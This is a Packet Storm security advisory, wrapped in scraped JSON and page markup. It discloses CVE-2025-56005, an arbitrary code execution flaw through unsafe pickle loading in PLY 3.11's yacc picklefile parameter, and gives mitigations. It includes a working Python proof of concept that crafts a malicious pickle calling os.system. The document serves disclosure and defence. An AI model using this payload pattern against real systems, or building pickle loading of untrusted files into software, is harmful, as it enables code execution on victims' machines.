{“lastseen”:”2026-01-27T17:13:35″,”description”:”An undocumented and unsafe feature in the PyPI\u2011distributed version of PLY version 3.11 allows arbitrary code execution when the yacc function is invoked with the picklefile parameter…”,”published”:”2026-01-27T00:00:00″,”modified”:”2026-01-27T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 PLY 3.11 Arbitrary Code Execution”,”source”:””,”references”:””,”id”:”PACKETSTORM:214433″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-56005″],”sourceData”:”# \ud83d\udea8 Undocumented Remote Code Execution in PLY CVE\u20112025\u201156005\\n \\n “`\\n CVE ID: CVE\u20112025\u201156005\\n Reported by: Ahmed Abd\\n Disclosure Date: July 1, 2025\\n Affected Product: PLY (Python Lex\u2011Yacc)\\n Affected Version: 3.11 (PyPI distribution)\\n Vendor: PLY (Python Lex\u2011Yacc)\\n Affected Component:** ply\/yacc.py` \u2014 `LRTable.read_pickle()` via `yacc(picklefile=…)`\\n \\n “`\\n ## Summary\\n \\n An undocumented and unsafe feature in the PyPI\u2011distributed version of **PLY 3.11** allows **arbitrary code execution** when the `yacc()` function is invoked with the `picklefile` parameter.\\n \\n The `picklefile` parameter causes PLY to deserialize a `.pkl` file using Python\u2019s `pickle.load()` **without validation**. Because Python\u2019s `pickle` module supports execution of arbitrary code during deserialization (e.g., via `__reduce__()`), an attacker who can control the supplied pickle file can execute arbitrary code during parser initialization.\\n \\n This parameter is **not documented** in the official PLY documentation or GitHub repository, yet it is active in the PyPI release.\\n \\n —\\n \\n ## Impact\\n \\n attacker can control, replace, or influence the `.pkl` file passed to `yacc(picklefile=…)`, they can achieve:\\n \\n * Arbitrary code execution\\n * Execution during application startup\\n * Code execution before any parsing logic is reached\\n \\n This may affect applications that load parser tables from:\\n \\n * Cached locations\\n * Shared directories\\n * CI\/CD pipelines\\n * Configurable or writable paths\\n \\n —\\n \\n ## \ud83d\udd0d Vulnerability Details\\n \\n * **Vulnerability Type:** Arbitrary Code Execution\\n * **Attack Type:** Context\u2011dependent\\n * **Attack Vector:** Unsafe deserialization of attacker\u2011controlled pickle file\\n * **Impact:** Code execution\\n * **CWE:** CWE\u2011502 (Deserialization of Untrusted Data)\\n \\n ### Affected Functionality\\n \\n * `ply.yacc.yacc(picklefile=…)`\\n * `LRTable.read_pickle()` in `ply\/yacc.py`\\n \\n —\\n \\n ## Additional Information (Context \\u0026 Risk)\\n \\n This vulnerability presents elevated risk due to its **stealthy nature** and potential for **persistence**.\\n \\n The `picklefile` parameter is **undocumented** in the official PLY documentation and GitHub repository. However, the PyPI\u2011distributed version of PLY 3.11 includes this functionality and processes the supplied file using `pickle.load()` without validation.\\n \\n Because Python\u2019s `pickle` module permits execution of embedded code during deserialization, a malicious pickle file can execute arbitrary code **during parser setup**, before any parsing logic is invoked.\\n \\n At the time of writing, the maintainer has not publicly acknowledged this behavior.\\n \\n This functionality can be abused to introduce **persistent backdoors**, particularly in environments where parser table files are:\\n \\n * Cached on disk\\n * Shared between users or services\\n * Generated or reused in CI\/CD pipelines\\n * Loaded from configurable or writable paths\\n \\n Given the lack of documentation, silent execution path, and the high impact of unsafe deserialization, a CVE assignment is warranted to raise awareness and protect downstream users.\\n \\n —\\n \\n ## Proof of Concept (PoC)\\n \\n This proof of concept demonstrates arbitrary code execution when a malicious pickle file is supplied via the undocumented `picklefile` parameter.\\n \\n ### PoC Overview\\n \\n The PoC:\\n \\n * Defines a minimal lexer and parser\\n * Crafts a malicious pickle payload\\n * Executes a system command during deserialization\\n \\n ### Expected Result\\n \\n When `yacc(picklefile=’exploit.pkl’)` is invoked, arbitrary code is executed during parser initialization.\\n \\n “`python\\n import pickle\\n import os\\n from ply.lex import lex\\n from ply.yacc import yacc\\n \\n tokens = (‘EXAMPLE’,)\\n \\n def t_EXAMPLE(t):\\n r’example’\\n return t\\n \\n def p_sample(p):\\n ‘sample : EXAMPLE’\\n pass\\n \\n class Exploit:\\n def __reduce__(self):\\n cmd = ‘touch \/tmp\/pwned \\u0026\\u0026 echo \\”VULNERABLE\\” \\u003e \/tmp\/pwned’\\n return (os.system, (cmd,))\\n \\n malicious_data = {\\n ‘_tabversion’: ‘3.11’,\\n ‘_lr_action’: {0: {}},\\n ‘_lr_goto’: {0: {}},\\n ‘_lr_productions’: [\\n (None, 0, 0, 0, Exploit())\\n ],\\n ‘_lr_method’: ‘LALR’\\n }\\n \\n with open(‘exploit.pkl’, ‘wb’) as f:\\n pickle.dump(malicious_data, f)\\n \\n parser = yacc(picklefile=’exploit.pkl’, debug=False, write_tables=False)\\n parser.parse(‘example’)\\n “`\\n \\n —\\n \\n ## Mitigation\\n \\n * Do **not** use the `picklefile` parameter with untrusted or externally writable files\\n * Avoid loading parser tables from user\u2011controlled locations\\n * Treat all pickle files as **unsafe input**\\n * Prefer regenerating parser tables rather than loading them from disk\\n \\n —\\n \\n \\n ## References\\n \\n * PLY GitHub Repository: [https:\/\/github.com\/dabeaz\/ply](https:\/\/github.com\/dabeaz\/ply)\\n * PyPI Package: [https:\/\/pypi.org\/project\/ply\/](https:\/\/pypi.org\/project\/ply\/)\\n * Python Pickle Documentation: [https:\/\/docs.python.org\/3\/library\/pickle.html](https:\/\/docs.python.org\/3\/library\/pickle.html)\\n * Proof of Concept Repository:\\n [https:\/\/github.com\/bohmiiidd\/Undocumented-RCE-in-PLY](https:\/\/github.com\/bohmiiidd\/Undocumented-RCE-in-PLY)”,”sourceHref”:”https:\/\/packetstorm.news\/download\/214433″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/214433\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-27T17:13:35″,”description”:”An undocumented and unsafe feature in the PyPI\u2011distributed version of PLY version 3.11 allows arbitrary code execution when the yacc function is invoked with the…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-37574","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n